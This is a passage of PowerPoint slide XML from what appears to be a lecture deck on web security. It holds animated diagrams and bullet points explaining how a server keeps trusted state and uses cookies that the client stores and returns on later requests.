            <a:ln w="12700" cap="flat">
              <a:noFill/>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3200">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:r>
                <a:t>Cookie</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="539" name="Connection Line">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC7AB7C6-2DC2-FF3A-966B-E63D6B515B78}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="176318" y="1127005"/>
              <a:ext cx="232773" cy="650929"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="wd2" y="hd2"/>
                </a:cxn>
                <a:cxn ang="5400000">
                  <a:pos x="wd2" y="hd2"/>
                </a:cxn>
                <a:cxn ang="10800000">
                  <a:pos x="wd2" y="hd2"/>
                </a:cxn>
                <a:cxn ang="16200000">
                  <a:pos x="wd2" y="hd2"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="16262" h="21600" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="16262" y="21600"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="-4084" y="16618"/>
                    <a:pt x="-5338" y="9418"/>
                    <a:pt x="12499" y="0"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="88900" cap="flat">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="400000"/>
              <a:headEnd type="triangle" w="med" len="med"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="530" name="Cookie">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CBF5CAD-127E-ADA9-CED8-93C2E2AE6A4E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3979227" y="5324767"/>
            <a:ext cx="1804083" cy="1118034"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 17039"/>
            </a:avLst>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId4"/>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Cookie</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="533" name="Group">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10ADEE7D-85C1-8128-2BC6-CA77C12EB976}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3420810" y="3874201"/>
            <a:ext cx="1804084" cy="1777934"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1804082" cy="1777933"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="531" name="Server">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2592B0CA-CB7E-39BB-5926-B90F7FAF94B5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="1804083" cy="1118034"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 17039"/>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3200">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:r>
                <a:t>Server</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="540" name="Connection Line">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2215539-40D0-1D1F-8148-CC06FCC39AD5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="176318" y="1127005"/>
              <a:ext cx="232773" cy="650929"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="wd2" y="hd2"/>
                </a:cxn>
                <a:cxn ang="5400000">
                  <a:pos x="wd2" y="hd2"/>
                </a:cxn>
                <a:cxn ang="10800000">
                  <a:pos x="wd2" y="hd2"/>
                </a:cxn>
                <a:cxn ang="16200000">
                  <a:pos x="wd2" y="hd2"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="16262" h="21600" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="16262" y="21600"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="-4084" y="16618"/>
                    <a:pt x="-5338" y="9418"/>
                    <a:pt x="12499" y="0"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="88900" cap="flat">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="400000"/>
              <a:headEnd type="triangle" w="med" len="med"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="534" name="Server maintains trusted state">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1E4E36E-EA00-5350-9150-56987C58453E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3757606" y="7781059"/>
            <a:ext cx="9735389" cy="90488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spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="617361" indent="-617361" algn="l">
              <a:spcBef>
                <a:spcPts val="4200"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:t>Server</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t> maintains trusted state</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="535" name="Server indexes/denotes state with a cookie">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC8AB0C8-C84E-F411-1D14-B65D80093372}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3755613" y="8609696"/>
            <a:ext cx="12518676" cy="84138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1064106" lvl="1" indent="-619606" algn="l">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buSzPct val="57000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="4600"/>
            </a:pPr>
            <a:r>
              <a:t>Server indexes/denotes state with a </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>cookie</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="536" name="Sends cookie to the client, which stores it">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E03FA2F4-BB01-12C5-1927-869AB846EA0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3766400" y="9364415"/>
            <a:ext cx="11989409" cy="841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1064106" lvl="1" indent="-619606" algn="l">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buSzPct val="57000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="4600"/>
            </a:pPr>
            <a:r>
              <a:t>Sends cookie to the client, which stores it</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="537" name="Client returns it with subsequent queries to that same server">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F15DD902-3421-456B-6165-8990589C0F6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3759741" y="10131831"/>
            <a:ext cx="16868647" cy="8413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1064106" lvl="1" indent="-619606" algn="l">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buSzPct val="57000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="4600"/>
            </a:pPr>
            <a:r>
              <a:t>Client returns it with subsequent queries to that same server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="538" name="Cookie">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B53AB64-944C-3F71-312B-47B5B030F0CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18600690" y="3867426"/>
            <a:ext cx="1804084" cy="1118034"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 17039"/>
            </a:avLst>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId4"/>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Cookie</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2458671408"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">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26"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="526"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="8" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="9" presetID="1" presetClass="exit" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="10" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="5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35"/>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iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="17" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="529"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(up)">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5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36"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="23" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="24" presetID="22" presetClass="entr" presetSubtype="2" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="25" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="522"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(right)">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="522"/>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p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="29" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="538"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="30" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="31" presetID="-1" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.000000 0.000000 L -0.172109 0.105957" pathEditMode="relative">
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="400" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="538"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="33" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="34" presetID="-1" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -0.172109 0.105957 L -0.599723 0.106028" pathEditMode="relative">
                                      <p:cBhvr>
                                        <p:cTn id="35" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="538"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="36" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="37" presetID="22" presetClass="entr" presetSubtype="1" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="38" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="533"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(up)">
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="533"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="40" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="41" presetID="1" presetClass="exit" presetSubtype="0" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="42" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="5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537"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="47" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="48" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="49" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="525"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="50" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="525"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="51" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="52" presetID="1" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="53" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="530"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="54" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="55" presetID="-1" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.000000 0.000000 L 0.182472 -0.098435" pathEditMode="relative">
                                      <p:cBhvr>
                                        <p:cTn id="56" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="530"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="57" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="58" presetID="-1" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.182472 -0.098435 L 0.434193 -0.098364" pathEditMode="relative">
                                      <p:cBhvr>
                                        <p:cTn id="59" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="530"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="60" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="61" presetID="-1" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.434193 -0.098364 L 0.614012 -0.133002" pathEditMode="relative">
                                      <p:cBhvr>
                                        <p:cTn id="62" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5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animBg="1" advAuto="0"/>
      <p:bldP spid="522" grpId="1" animBg="1" advAuto="0"/>
      <p:bldP spid="525" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="525" grpId="1" animBg="1" advAuto="0"/>
      <p:bldP spid="526" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="529" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="530" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="533" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="535" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="536" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="537" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="538"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CBE75-47F0-BB52-EB92-5F87833655A7}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="542" name="Screen Shot 2014-02-18 at 3.27.40 AM.png" descr="Screen Shot 2014-02-18 at 3.27.40 AM.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9935AE85-CC49-E6DB-BF2D-B8EF5C0E43E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4584209" y="3434759"/>
            <a:ext cx="14476727" cy="7969408"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="543" name="Rectangle">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49768DD4-4945-3905-7E71-EBF87508F062}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4635889" y="3423398"/>
            <a:ext cx="14441008" cy="9318574"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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546" name="Group">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B686F52-FA92-3987-2446-67F853EF1EEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4641587" y="11634894"/>
            <a:ext cx="13139222" cy="1009199"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="13139220" cy="1009197"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="544" name="Rectangle">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D443970A-1105-552A-FE5B-3E0538101FDE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
